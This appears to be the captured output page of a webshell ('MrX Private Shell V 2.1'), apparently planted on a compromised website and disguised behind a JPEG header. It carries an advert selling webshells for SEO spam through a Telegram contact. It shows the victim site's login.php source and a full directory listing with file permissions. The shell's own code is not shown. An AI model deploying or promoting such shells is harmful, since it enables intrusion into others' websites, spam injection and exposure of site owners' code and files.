����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// login.php
require_once 'config.php';
require_once 'auth.php';
$error = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['login'])) {
if (verifyCSRFToken($_POST['csrf_token'] ?? '')) {
$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';
if (Authentication::login($username, $password)) {
header('Location: admin.php');
exit;
} else {
$error = "Invalid credentials!";
}
} else {
$error = "Security token invalid!";
}
}
if (Authentication::isLoggedIn()) {
header('Location: admin.php');
exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Admin Login</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<div class="container mt-5">
<div class="row justify-content-center">
<div class="col-md-4">
<div class="card">
<div class="card-header">
<h4>Admin Login</h4>
</div>
<div class="card-body">
<?php if ($error): ?>
<div class="alert alert-danger"><?php echo htmlspecialchars($error); ?></div>
<?php endif; ?>
<form method="POST">
<input type="hidden" name="csrf_token" value="<?php echo $_SESSION['csrf_token']; ?>">
<div class="mb-3">
<label class="form-label">Username</label>
<input type="text" name="username" class="form-control" required>
</div>
<div class="mb-3">
<label class="form-label">Password</label>
<input type="password" name="password" class="form-control" required>
</div>
<button type="submit" name="login" value="1" class="btn btn-primary w-100">Login</button>
</form>
</div>
</div>
</div>
</div>
</div>
</body>
</html>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| .well-known | Folder | 0777 |
|
|
| cache | Folder | 0777 |
|
|
| content | Folder | 0777 |
|
|
| content1 | Folder | 0777 |
|
|
| image | Folder | 0777 |
|
|
| .ftpquota | File | 12 B | 0666 |
|
| .htaccess | File | 197 B | 0444 |
|
| 404.php | File | 1.31 KB | 0666 |
|
| admin.php | File | 35.14 KB | 0666 |
|
| android-chrome-192x192.png | File | 78.08 KB | 0666 |
|
| android-chrome-512x512.png | File | 378.8 KB | 0666 |
|
| apple-touch-icon.png | File | 69.97 KB | 0666 |
|
| arealist.xml | File | 13.18 KB | 0666 |
|
| auth.php | File | 884 B | 0666 |
|
| cache.php | File | 948 B | 0666 |
|
| config.php | File | 1.61 KB | 0666 |
|
| content_manager.php | File | 11.84 KB | 0666 |
|
| delhigal.zip | File | 6.82 MB | 0644 |
|
| error_log | File | 778 B | 0666 |
|
| favicon-16x16.png | File | 977 B | 0666 |
|
| favicon-32x32.png | File | 3.26 KB | 0666 |
|
| favicon.ico | File | 15.04 KB | 0666 |
|
| frontpage.php | File | 113.04 KB | 0666 |
|
| google2fabcdaeda4836e4.html | File | 53 B | 0666 |
|
| index.php | File | 1.62 KB | 0666 |
|
| index1.html | File | 0 B | 0666 |
|
| index1.php | File | 1.63 KB | 0666 |
|
| login.php | File | 2.28 KB | 0666 |
|
| logout.php | File | 73 B | 0666 |
|
| robots.txt | File | 25 B | 0666 |
|
| site.webmanifest | File | 272 B | 0666 |
|
| sitemap.xml | File | 501 B | 0666 |
|
| style.css | File | 27.09 KB | 0666 |
|
| template.php | File | 93.07 KB | 0666 |
|
| wp-blog-header.php | File | 2.74 KB | 0644 |
|
| wp-cron.php | File | 2.74 KB | 0644 |
|
| xml_manager.php | File | 4.17 KB | 0666 |
|